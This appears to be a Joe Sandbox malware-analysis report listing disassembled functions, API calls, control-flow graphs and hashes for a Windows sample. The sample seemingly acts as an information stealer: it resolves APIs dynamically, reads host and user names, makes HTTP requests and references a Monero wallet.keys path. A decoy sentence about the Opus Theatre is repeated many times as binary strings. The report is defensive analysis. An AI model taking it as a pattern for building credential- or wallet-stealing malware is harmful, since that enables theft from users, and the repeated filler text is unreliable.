                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE45F3
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE471E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE466D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4662
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4643
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE45DD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4713
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE46C2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE474F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE45E8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE45D2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE46CD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE473F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE46D8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE45C7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 6d98a91b1f50d385b9343dfd4eccc831c1b3bed83d1acb50827c91513672a929
                              • Instruction ID: 5a073ed60d8160fb0d5ad675a441b9453e630bd1c19105168d25fa5f20969356
                              • Opcode Fuzzy Hash: 6d98a91b1f50d385b9343dfd4eccc831c1b3bed83d1acb50827c91513672a929
                              • Instruction Fuzzy Hash: 1541E861FCB708EAC725B7ACA84FD9E76556F49F01F917044ED00A22C0C6F469804FA7
                              Function 00DE4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 801 de4880-de4942 call dfa7a0 call de47b0 call dfa740 * 5 InternetOpenA StrCmpCA 816 de494b-de494f 801->816 817 de4944 801->817 818 de4ecb-de4ef3 InternetCloseHandle call dfaad0 call de9ac0 816->818 819 de4955-de4acd call df8b60 call dfa920 call dfa8a0 call dfa800 * 2 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa920 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa920 call dfa8a0 call dfa800 * 2 InternetConnectA 816->819 817->816 829 de4ef5-de4f2d call dfa820 call dfa9b0 call dfa8a0 call dfa800 818->829 830 de4f32-de4fa2 call df8990 * 2 call dfa7a0 call dfa800 * 8 818->830 819->818 905 de4ad3-de4ad7 819->905 829->830 906 de4ad9-de4ae3 905->906 907 de4ae5 905->907 908 de4aef-de4b22 HttpOpenRequestA 906->908 907->908 909 de4ebe-de4ec5 InternetCloseHandle 908->909 910 de4b28-de4e28 call dfa9b0 call dfa8a0 call dfa800 call dfa920 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa920 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa920 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa9b0 call dfa8a0 call dfa800 call dfa920 call dfa8a0 call dfa800 call dfa740 call dfa920 * 2 call dfa8a0 call dfa800 * 2 call dfaad0 lstrlen call dfaad0 * 2 lstrlen call dfaad0 HttpSendRequestA 908->910 909->818 1021 de4e32-de4e5c InternetReadFile 910->1021 1022 de4e5e-de4e65 1021->1022 1023 de4e67-de4eb9 InternetCloseHandle call dfa800 1021->1023 1022->1023 1024 de4e69-de4ea7 call dfa9b0 call dfa8a0 call dfa800 1022->1024 1023->909 1024->1021
                              APIs
                                • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                                • Part of subcall function 00DE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00DE4839
                                • Part of subcall function 00DE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00DE4849
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00DE4915
                              • StrCmpCA.SHLWAPI(?,0197F1D8), ref: 00DE493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00DE4ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00E00DDB,00000000,?,?,00000000,?,",00000000,?,0197F0A8), ref: 00DE4DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00DE4E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00DE4E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00DE4E49
                              • InternetCloseHandle.WININET(00000000), ref: 00DE4EAD
                              • InternetCloseHandle.WININET(00000000), ref: 00DE4EC5
                              • HttpOpenRequestA.WININET(00000000,0197F148,?,0197E7B8,00000000,00000000,00400100,00000000), ref: 00DE4B15
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                              • InternetCloseHandle.WININET(00000000), ref: 00DE4ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: dd1e98a7393cf4c319b00c5bb5643410a06635b631a93a2f378366135ddc0e96
                              • Instruction ID: 8091c23c60feb5a8c3bac10016096318978e3986fe67815c1896da0bb4d100cd
                              • Opcode Fuzzy Hash: dd1e98a7393cf4c319b00c5bb5643410a06635b631a93a2f378366135ddc0e96
                              • Instruction Fuzzy Hash: 7212DCB191021CAADB15EB94DC92FEEB378EF54340F5581A9B20A66091DFB02F49CF71
                              Function 00DF78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00DF7910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DF7917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 00DF792F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: 8774e9a496f538e34786d0abcabb9a4b8315b0d4a9b0aed41818d54162bf0e15
                              • Instruction ID: b480fa98abc5c20da14bbe751e36b7d0fa4a2222d3c9910be5d0655ce6ad7f0d
                              • Opcode Fuzzy Hash: 8774e9a496f538e34786d0abcabb9a4b8315b0d4a9b0aed41818d54162bf0e15
                              • Instruction Fuzzy Hash: 5C01A9B1A04209EFC710DF94DD45FAEBBB8F704B21F11421AFA45E3680C7B959048BB1
                              Function 00DF7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00DE11B7), ref: 00DF7880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DF7887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00DF789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: 35021d94ae6670de6d0072cd76d4e37a19e15e8c162c8b6560afe1229451376a
                              • Instruction ID: 5a448d23c658373e77c34eb349424558cb154523492d71a329491e973fe496e7
                              • Opcode Fuzzy Hash: 35021d94ae6670de6d0072cd76d4e37a19e15e8c162c8b6560afe1229451376a
                              • Instruction Fuzzy Hash: AFF04FB1E44208EFC724DF98D949FAEBBB8FB04721F10065AFA45A3680C7B955048BA1
                              Function 00DE1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: 4e6476ff0239fcfebb22316d7bb712edfbcc813534dbbbac58f91699a9ded12f
                              • Instruction ID: 50da218900c40e776c324182e9162bc9c570d019105f0ecda21c70c5030fa801
                              • Opcode Fuzzy Hash: 4e6476ff0239fcfebb22316d7bb712edfbcc813534dbbbac58f91699a9ded12f
                              • Instruction Fuzzy Hash: B9D05E74A0030CDBCB20EFE0DC496EDBBB8FB08311F100554D90663740EA315481CBA9
                              Function 00DF9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 633 df9c10-df9c1a 634 dfa036-dfa0ca LoadLibraryA * 8 633->634 635 df9c20-dfa031 GetProcAddress * 43 633->635 636 dfa0cc-dfa141 GetProcAddress * 5 634->636 637 dfa146-dfa14d 634->637 635->634 636->637 638 dfa216-dfa21d 637->638 639 dfa153-dfa211 GetProcAddress * 8 637->639 640 dfa21f-dfa293 GetProcAddress * 5 638->640 641 dfa298-dfa29f 638->641 639->638 640->641 642 dfa337-dfa33e 641->642 643 dfa2a5-dfa332 GetProcAddress * 6 641->643 644 dfa41f-dfa426 642->644 645 dfa344-dfa41a GetProcAddress * 9 642->645 643->642 646 dfa428-dfa49d GetProcAddress * 5 644->646 647 dfa4a2-dfa4a9 644->647 645->644 646->647 648 dfa4dc-dfa4e3 647->648 649 dfa4ab-dfa4d7 GetProcAddress * 2 647->649 650 dfa515-dfa51c 648->650 651 dfa4e5-dfa510 GetProcAddress * 2 648->651 649->648 652 dfa612-dfa619 650->652 653 dfa522-dfa60d GetProcAddress * 10 650->653 651->650 654 dfa67d-dfa684 652->654 655 dfa61b-dfa678 GetProcAddress * 4 652->655 653->652 656 dfa69e-dfa6a5 654->656 657 dfa686-dfa699 GetProcAddress 654->657 655->654 658 dfa708-dfa709 656->658 659 dfa6a7-dfa703 GetProcAddress * 4 656->659 657->656 659->658
                              APIs
                              • GetProcAddress.KERNEL32(75900000,01965E08), ref: 00DF9C2D
                              • GetProcAddress.KERNEL32(75900000,01965AC8), ref: 00DF9C45
                              • GetProcAddress.KERNEL32(75900000,01978DD8), ref: 00DF9C5E
                              • GetProcAddress.KERNEL32(75900000,01978DA8), ref: 00DF9C76
                              • GetProcAddress.KERNEL32(75900000,0197C8F0), ref: 00DF9C8E
                              • GetProcAddress.KERNEL32(75900000,0197C800), ref: 00DF9CA7
                              • GetProcAddress.KERNEL32(75900000,0196B280), ref: 00DF9CBF
                              • GetProcAddress.KERNEL32(75900000,0197C6E0), ref: 00DF9CD7
                              • GetProcAddress.KERNEL32(75900000,0197C680), ref: 00DF9CF0
                              • GetProcAddress.KERNEL32(75900000,0197C710), ref: 00DF9D08
                              • GetProcAddress.KERNEL32(75900000,0197C890), ref: 00DF9D20
                              • GetProcAddress.KERNEL32(75900000,01965D68), ref: 00DF9D39
                              • GetProcAddress.KERNEL32(75900000,01965D28), ref: 00DF9D51
                              • GetProcAddress.KERNEL32(75900000,01965DA8), ref: 00DF9D69
                              • GetProcAddress.KERNEL32(75900000,01965AE8), ref: 00DF9D82
                              • GetProcAddress.KERNEL32(75900000,0197C6B0), ref: 00DF9D9A
                              • GetProcAddress.KERNEL32(75900000,0197C6F8), ref: 00DF9DB2
                              • GetProcAddress.KERNEL32(75900000,0196B2D0), ref: 00DF9DCB
                              • GetProcAddress.KERNEL32(75900000,01965DC8), ref: 00DF9DE3
                              • GetProcAddress.KERNEL32(75900000,0197C830), ref: 00DF9DFB
                              • GetProcAddress.KERNEL32(75900000,0197C6C8), ref: 00DF9E14
                              • GetProcAddress.KERNEL32(75900000,0197C908), ref: 00DF9E2C
                              • GetProcAddress.KERNEL32(75900000,0197C770), ref: 00DF9E44
                              • GetProcAddress.KERNEL32(75900000,01965DE8), ref: 00DF9E5D
                              • GetProcAddress.KERNEL32(75900000,0197C848), ref: 00DF9E75
                              • GetProcAddress.KERNEL32(75900000,0197C728), ref: 00DF9E8D
                              • GetProcAddress.KERNEL32(75900000,0197C878), ref: 00DF9EA6
                              • GetProcAddress.KERNEL32(75900000,0197C740), ref: 00DF9EBE
                              • GetProcAddress.KERNEL32(75900000,0197C758), ref: 00DF9ED6
                              • GetProcAddress.KERNEL32(75900000,0197C698), ref: 00DF9EEF
                              • GetProcAddress.KERNEL32(75900000,0197C938), ref: 00DF9F07
                              • GetProcAddress.KERNEL32(75900000,0197C860), ref: 00DF9F1F
                              • GetProcAddress.KERNEL32(75900000,0197C950), ref: 00DF9F38
                              • GetProcAddress.KERNEL32(75900000,01979E68), ref: 00DF9F50
                              • GetProcAddress.KERNEL32(75900000,0197C8A8), ref: 00DF9F68
                              • GetProcAddress.KERNEL32(75900000,0197C788), ref: 00DF9F81
                              • GetProcAddress.KERNEL32(75900000,01965E28), ref: 00DF9F99
                              • GetProcAddress.KERNEL32(75900000,0197C7A0), ref: 00DF9FB1
                              • GetProcAddress.KERNEL32(75900000,01965E48), ref: 00DF9FCA
                              • GetProcAddress.KERNEL32(75900000,0197C7B8), ref: 00DF9FE2
                              • GetProcAddress.KERNEL32(75900000,0197C7D0), ref: 00DF9FFA
                              • GetProcAddress.KERNEL32(75900000,01965968), ref: 00DFA013
                              • GetProcAddress.KERNEL32(75900000,01965728), ref: 00DFA02B
                              • LoadLibraryA.KERNEL32(0197C7E8,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA03D
                              • LoadLibraryA.KERNEL32(0197C818,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA04E
                              • LoadLibraryA.KERNEL32(0197C8C0,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA060
                              • LoadLibraryA.KERNEL32(0197C8D8,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA072
                              • LoadLibraryA.KERNEL32(0197C920,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA083
                              • LoadLibraryA.KERNEL32(0197C668,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA095
                              • LoadLibraryA.KERNEL32(0197CBA8,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA0A7
                              • LoadLibraryA.KERNEL32(0197C9B0,?,00DF5CA3,00E00AEB,?,?,?,?,?,?,?,?,?,?,00E00AEA,00E00AE3), ref: 00DFA0B8
                              • GetProcAddress.KERNEL32(75FD0000,01965948), ref: 00DFA0DA
                              • GetProcAddress.KERNEL32(75FD0000,0197CBD8), ref: 00DFA0F2
